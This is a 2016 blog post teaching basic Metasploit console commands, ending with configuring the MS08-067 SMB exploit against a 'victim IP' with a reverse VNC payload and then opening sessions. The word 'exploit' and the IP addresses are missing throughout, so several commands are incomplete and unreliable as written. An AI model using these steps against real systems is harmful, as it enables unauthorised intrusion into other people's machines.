Thursday, May 26, 2016

Metasploit Basic Command Tutorial

Metasploit Basic Command TutorialHello Friends,
Metasploit is the database of all s and a software that contain information about different s so here is the basic usage of metasploit, I am using backtrack 5 machine for this tutorial however if you are using other Linux distribution or OS than it is fine but the requirement is Metasploit. This is a simple tutorial by me .If you wanna lrn more about metasploit go to Wikipedia. MsfconsoleMsfconsole is a console or a command of metasploit that will give you the full support of internal and external metasploit commands, there was a web interface of metasploit but now we don't have that option.
So on your terminal type msfconsole to start metasploit console. root@bt:~# msfconsole
Metasploit is also available on GUI (graphical user interface), if you want to run metasploit GUI than on the terminal type. root@bt:~# msfgui Help command of metasploit will give you the basic id about the usage of metasploit, if you are looking for msfconsole help than from the root type. root@bt:~# msfconsole -h For msfconsole usage you need to be on msfconsole window to get the help. msf > help Connect command is nothing but the alternate of telnet and n in metasploit, use connect command to connect with the remote and local host on metasploit you can define the IP of the host machine. msf > connect -s 443
[*] Connected to
GET / HTTP/1.0-s → SSL
Ping command of msfconsole is to check the alive host and so on. msf > ping s is a command to check all the available s on metasploit. msf > show s Show payloads just like show s, show payloads will show you all the available payloads on metasploit. msf > show payloads Info command will give you more information about any s and payloads. msf>info <>
msf>info <payload> Use command will give metasploit an instruction to use a or payload. msf > use //smb/ms08_067_netapi
msf (ms08_067_netapi) >
msf (ms08_067_netapi) > show options To show available options
msf (ms08_067_netapi) > set rhost → To set remote IP (victim IP)
msf (ms08_067_netapi) > set lhost → To set local IP (attacker IP)
msf (ms08_067_netapi) > set rport 445 → To set port of remote host
msf (ms08_067_netapi) > set lport 443 → To set port of local host
msf (ms08_067_netapi) > set payload /vncinject/reverse_tcp_dns → Tp set payload

msf (ms08_067_netapi) > unset rhost → To remove rhost
msf (ms08_067_netapi) > unset lhost → To remove local host
msf (ms08_067_netapi) > → To execute
msf (ms08_067_netapi) > back → To go back on the main window
msf (ms08_067_netapi) > sessions -l → To check any active session
msf (ms08_067_netapi) > sessions -i ID → To go on a active session ID must be numeric

No comments:

Post a Comment